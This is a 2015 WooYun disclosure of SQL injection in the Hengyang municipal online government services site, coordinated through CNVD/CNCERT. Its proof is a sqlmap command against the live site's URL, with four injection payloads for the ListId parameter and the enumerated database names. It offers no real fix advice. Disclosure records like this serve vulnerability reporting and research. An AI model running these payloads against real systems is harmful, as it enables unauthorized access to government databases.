漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0105924
漏洞标题:衡阳网上政务服务大厅 存在SQ注射
相关厂商:衡阳市电子政务管理办公室
漏洞作者: Whoami‘
提交时间:2015-04-07 18:40
修复时间:2015-05-25 18:52
公开时间:2015-05-25 18:52
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:8
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-07: 细节已通知厂商并且等待厂商处理中
2015-04-10: 厂商已经确认,细节仅向厂商公开
2015-04-20: 细节向核心白帽子及相关领域专家公开
2015-04-30: 细节向普通白帽子公开
2015-05-10: 细节向实习白帽子公开
2015-05-25: 细节向公众公开
简要描述:
自己看!
详细说明:
漏洞证明:
C:\Python27\sqlmap\sqlmap>sqlmap.py -u "http://shenpi.hengyang.gov.cn/hypage/Sce
neService.aspx?ListId=29E63F29C697442C9E0BC78B9125A612&SceneServiceNO=0" --dbs
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 22:29:41
[22:29:41] [INFO] using 'C:\Python27\sqlmap\sqlmap\output\shenpi.hengyang.gov.cn
\session' as session file
[22:29:41] [INFO] resuming injection data from session file
[22:29:41] [INFO] resuming back-end DBMS 'microsoft sql server 2008' from sessio
n file
[22:29:41] [INFO] resuming remote absolute path of temporary files directory 'C:
/WINDOWS/Temp' from session file
[22:29:41] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: ListId
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ListId=29E63F29C697442C9E0BC78B9125A612' AND 8602=8602 AND 'qMFX'='
qMFX&SceneServiceNO=0
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ListId=29E63F29C697442C9E0BC78B9125A612' AND 3148=CONVERT(INT,(CHAR
(58)+CHAR(115)+CHAR(118)+CHAR(106)+CHAR(58)+(SELECT (CASE WHEN (3148=3148) THEN
CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(108)+CHAR(105)+CHAR(120)+CHAR(58))) A
ND 'Peqw'='Peqw&SceneServiceNO=0
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ListId=29E63F29C697442C9E0BC78B9125A612'; WAITFOR DELAY '0:0:5';--
AND 'FqVi'='FqVi&SceneServiceNO=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ListId=29E63F29C697442C9E0BC78B9125A612' WAITFOR DELAY '0:0:5'-- AN
D 'gYSL'='gYSL&SceneServiceNO=0
---
[22:29:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[22:29:43] [INFO] fetching database names
[22:29:43] [INFO] read from file 'C:\Python27\sqlmap\sqlmap\output\shenpi.hengya
ng.gov.cn\session': 7
[22:29:43] [INFO] the SQL query used returns 7 entries
[22:29:43] [INFO] read from file 'C:\Python27\sqlmap\sqlmap\output\shenpi.hengya
ng.gov.cn\session': hypowermanager
[22:29:43] [INFO] read from file 'C:\Python27\sqlmap\sqlmap\output\shenpi.hengya
ng.gov.cn\session': master
[22:29:43] [INFO] read from file 'C:\Python27\sqlmap\sqlmap\output\shenpi.hengya
ng.gov.cn\session': model
[22:29:43] [INFO] read from file 'C:\Python27\sqlmap\sqlmap\output\shenpi.hengya
ng.gov.cn\session': msdb
[22:29:43] [INFO] read from file 'C:\Python27\sqlmap\sqlmap\output\shenpi.hengya
ng.gov.cn\session': ReportServer
[22:29:43] [INFO] read from file 'C:\Python27\sqlmap\sqlmap\output\shenpi.hengya
ng.gov.cn\session': ReportServerTempDB
[22:29:43] [INFO] read from file 'C:\Python27\sqlmap\sqlmap\output\shenpi.hengya
ng.gov.cn\session': tempdb
available databases [7]:
[*] hypowermanager
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[22:29:43] [INFO] Fetched data logged to text files under 'C:\Python27\sqlmap\sq
lmap\output\shenpi.hengyang.gov.cn'
[*] shutting down at: 22:29:43
修复方案:
自己看着办1!!
版权声明:转载请注明来源 Whoami‘@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-04-10 18:51
厂商回复:
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给湖南分中心,由湖南分中心后续协调网站管理单位处置。
最新状态:
暂无